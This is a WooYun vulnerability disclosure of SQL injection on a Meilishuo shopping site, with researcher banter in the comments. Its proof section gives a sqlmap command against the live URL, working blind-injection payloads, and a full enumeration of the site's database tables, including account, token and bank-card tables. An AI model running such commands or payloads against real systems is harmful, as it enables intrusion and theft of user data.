
Vulnerability summary

Defect ID: wooyun-2015-0114227

Vulnerability title: SQL injection on a Meilishuo site, at a glance at least 270,000 user records

Affected vendor: Meilishuo (美丽说)

Vulnerability author: 蛋蛋侠

Submitted: 2015-05-15 10:10

Fixed: 2015-06-29 10:56

Published: 2015-06-29 10:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-15: Details sent to the vendor, awaiting vendor response
2015-05-15: Vendor has confirmed; details disclosed to the vendor only
2015-05-25: Details disclosed to core white hats and relevant domain experts
2015-06-04: Details disclosed to regular white hats
2015-06-14: Details disclosed to intern white hats
2015-06-29: Details disclosed to the public

Brief description:

What I dislike most are people who keep asking the vendor for gifts~ Damn! If they really won't give you any, just keep submitting vulnerabilities!!

Detailed description:

[Screenshot: QQ截图20150515081651.png]

[Screenshot: QQ截图20150515081845.png]

Proof of vulnerability:

[root@Hacker~]# Sqlmap Sqlmap -u "http://higo.meilishuo.com/hgwap/index.php/seller/discover?allian_code=543410ce6c2ebee" -D higo --count --threads 10
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all a
[*] starting at 08:12:43
[08:12:44] [INFO] resuming back-end DBMS 'mysql'
[08:12:44] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: allian_code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: allian_code=543410ce6c2ebee' AND 5563=5563 AND 'iYSA'='iYSA
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: allian_code=543410ce6c2ebee' AND SLEEP(5) AND 'zPNY'='zPNY
---
[08:12:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[08:12:44] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[08:12:44] [INFO] fetching tables for database: 'higo'
[08:12:44] [INFO] fetching number of tables for database 'higo'
[08:12:44] [INFO] resumed: 168
Database: higo
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| t_pandora_favorite | 5783893 |
| t_pandora_statistics | 4468950 |
| t_pandora_coupon | 1090107 |
| t_pandora_xmpp_message | 734054 |
| t_pandora_image | 622056 |
| TBL_ADMIN_LOG | 512125 |
| tbl_admin_newlogs | 474891 |
| t_pandora_basic_goods_statistics | 402593 |
| t_pandora_account | 273487 |
| t_pandora_account_token | 271362 |
| t_pandora_buyer | 270143 |
| t_pandora_xmpp_users | 231484 |
| t_pandora_account_connect | 219037 |
| t_pandora_push_device | 168262 |
| t_pandora_express_tracking | 139857 |
| t_pandora_friends | 124990 |
| t_pandora_goods_sku | 85876 |
| t_pandora_search_keywords | 56463 |
| t_pandora_goods | 48382 |
| t_pandora_order_item | 41737 |
| t_pandora_address | 41179 |
| t_pandora_order_pay | 40011 |
| t_pandora_order_pay_ref | 39134 |
| t_pandora_pay_receipt_record | 38882 |
| t_pandora_coupon_collectlog | 36175 |
| t_pandora_order_express | 33249 |
| t_pandora_order | 33214 |
| t_pandora_order_pay_confirm | 14648 |
| t_pandora_bill_balance | 12920 |
| t_pandora_settlement_item | 11901 |
| t_pandora_order_receivepush | 10628 |
| t_pandora_report_event_shop_goods | 9613 |
| t_pandora_syn_goods_img | 8822 |
| t_pandora_basic_events_statistics | 5956 |
| t_pandora_brand | 5343 |
| t_pandora_syn_goods_sku | 4342 |
| t_pandora_buyer_recruitment | 4200 |
| t_pandora_settlement | 3908 |
| t_pandora_order_operation | 3678 |
| t_pandora_shop | 3396 |
| t_pandora_wap_click_goods | 2555 |
| t_pandora_shop_show | 2496 |
| t_pandora_bill_withdraw | 2484 |
| t_pandora_event_goods | 2428 |
| t_pandora_invite_simple | 2271 |
| t_pandora_mls_goods_prop | 2270 |
| t_pandora_account_group | 2142 |
| t_pandora_syn_goods | 2112 |
| t_pandora_weixin_answer_rank | 2094 |
| t_pandora_temporary_users | 2001 |
| t_pandora_order_revoke | 1750 |
| t_pandora_dimension_shop | 1498 |
| t_pandora_sales_goods | 1251 |
| t_pandora_product_collocation_data | 1241 |
| t_pandora_mls_goods | 1136 |
| t_pandora_mls_order | 1127 |
| t_pandora_mls_higo_order | 1126 |
| t_pandora_mls_order_freight | 1126 |
| t_pandora_mls_user_info | 1126 |
| t_pandora_account_group_notice | 1019 |
| t_pandora_account_group_expansion | 1001 |
| p_logs | 906 |
| ouid | 895 |
| t_pandora_account_bankcard_history | 831 |
| t_pandora_report_event_shop | 826 |
| t_pandora_buyersdb | 795 |
| t_pandora_sales_statistics | 765 |
| t_pandora_mls_address | 686 |
| user_no_nick | 671 |
| t_pandora_account_bankcard | 641 |
| t_pandora_coupon_usedlog | 606 |
| t_pandora_show_tag | 450 |
| t_pandora_product_collocation | 443 |
| push_log | 424 |
| t_pandora_events | 344 |
| t_pandora_report_log | 298 |
| TBL_ADMIN_FUNCTION | 290 |
| t_pandora_bill_summary | 282 |
| t_pandora_welfare_log | 270 |
| t_pandora_top_keywords | 202 |
| t_pandora_goods_keywords | 191 |
| t_pandora_country_code | 186 |
| t_pandora_order_remark | 181 |
| t_pandora_totalgmv | 168 |
| t_pandora_color | 140 |
| t_pandora_event_show_goods | 138 |
| t_pandora_group_keywords | 135 |
| t_pandora_category_material | 124 |
| t_pandora_events_expic | 115 |
| t_pandora_welfare | 110 |
| t_pandora_goods_seckill | 109 |
| t_pandora_coupon_goods | 102 |
| t_pandora_category_size | 94 |
| t_pandora_weixin_answer_recommend | 92 |
| t_pandora_category | 89 |
| t_pandora_event_show | 76 |
| t_pandora_wap_stat | 76 |
| t_pandora_eventgmv | 73 |
| t_pandora_order_rapid | 68 |
| t_pandora_final_wap_statistics | 55 |
| t_pandora_express_company | 53 |
| t_pandora_group_banner | 41 |
| t_pandora_silence | 41 |
| TBL_ADMINS | 39 |
| t_pandora_home_banner | 33 |
| t_pandora_coupon_statistics | 32 |
| t_pandora_order_vipsettle | 27 |
| t_pandora_shop_alliance | 26 |
| t_pandora_shop_vip | 25 |
| t_pandora_material | 23 |
| t_pandora_wap_statistics | 19 |
| t_pandora_brand_goods | 18 |
| t_pandora_report_event | 18 |
| t_pandora_order_refund_pay | 17 |
| t_pandora_shop_change | 17 |
| t_pandora_bank | 15 |
| t_pandora_id_wrapper | 13 |
| t_pandora_recommend_category | 11 |
| TBL_ADMIN_FUNCTION_CAT | 11 |
| t_pandora_dimension | 10 |
| t_pandora_login_tips | 10 |
| t_pandora_coupon_batch | 8 |
| t_pandora_hot_keywords | 7 |
| t_pandora_currency | 6 |
| t_pandora_order_refund | 6 |
| t_pandora_fairy_log | 5 |
| t_pandora_sphinx_counter | 5 |
| t_pandora_goods_tag | 3 |
| t_pandora_order_return | 3 |
| t_pandora_order_return_log | 3 |
| t_pandora_abroad_shop | 2 |
| t_pandora_goods_limitation | 2 |
| t_pandora_inviter | 2 |
| t_pandora_category_whitelist | 1 |
| t_pandora_fairy_log_failure | 1 |
| t_pandora_video | 1 |
+------------------------------------+---------+
[08:12:47] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occ
[08:12:47] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\higo.meilishuo.com'

Remediation:

Hello, Meilishuo!

Copyright notice: please credit the source when reposting: 蛋蛋侠@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmation time: 2015-05-15 10:54

Vendor reply:

Thank you very much for your attention to Meilishuo's security. The vulnerability has been verified to be real, and the business department has been contacted for an urgent fix.

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2015-05-15 10:12 | prolog ( Regular white hat | Rank:544 Vulnerabilities:107 | Keeping a low profile, seeking growth)

    I hate it most when people keep asking vendors for gifts at every turn~ Damn! If they really won't give you one, just keep submitting vulnerabilities as hard as you can!!

  2. 2015-05-15 10:13 | ’‘Nome ( Intern white hat | Rank:55 Vulnerabilities:19 | Thanks here to @M4sk @mango @裤裆 @泳少 @5up3r...)

    @撸撸侠 @管管侠 who is he??? @蛋蛋侠

  3. 2015-05-15 10:26 | 动感超人 ( Intern white hat | Rank:42 Vulnerabilities:10 | Watch out for the Action Beam)

    A trinity of divine skills??? @撸撸侠 @管管侠 @蛋蛋侠, merge and transform into SkullGreymon

  4. 2015-05-15 10:46 | 放开那个漏洞,让我来 ( Passerby | Rank:20 Vulnerabilities:2 | Trying to load bio.........)

    I hate it most when people keep asking vendors for gifts at every turn~ Damn! If they really won't give you one, just keep submitting vulnerabilities as hard as you can!!

  5. 2015-05-15 11:14 | 管管侠 ( Core white hat | Rank:1368 Vulnerabilities:108 | Taking a few days off, I'll let you show off for a while!!!)

    @’‘Nome There should also be 疼疼侠, 砸砸侠 and the like

  6. 2015-05-15 11:15 | 管管侠 ( Core white hat | Rank:1368 Vulnerabilities:108 | Taking a few days off, I'll let you show off for a while!!!)

    扯扯侠

  7. 2015-05-15 11:33 | 紫霞仙子 ( Regular white hat | Rank:2027 Vulnerabilities:279 | Onward and upward every day !!!)

    蛋蛋侠's bio says: I am just an egg. So what should 管管侠's bio be?

  8. 2015-05-15 12:09 | 北丐 ( Regular white hat | Rank:104 Vulnerabilities:20 | )

    OP, did they give you a gift?

  9. 2015-07-14 19:50 | 一只船北街 ( Regular white hat | Rank:418 Vulnerabilities:60 | Closed for private study of technique...)

    Boolean based, and you pulled out this much data; you must have really "pushed hard"

  10. 2015-07-16 14:47 | 蛋蛋侠 ( Regular white hat | Rank:100 Vulnerabilities:13 | I am an egg)

    @北丐 Still haven't received a gift to this day

  11. 2015-07-16 14:50 | 北丐 ( Regular white hat | Rank:104 Vulnerabilities:20 | )

    @蛋蛋侠 Meilishuo, what a rip-off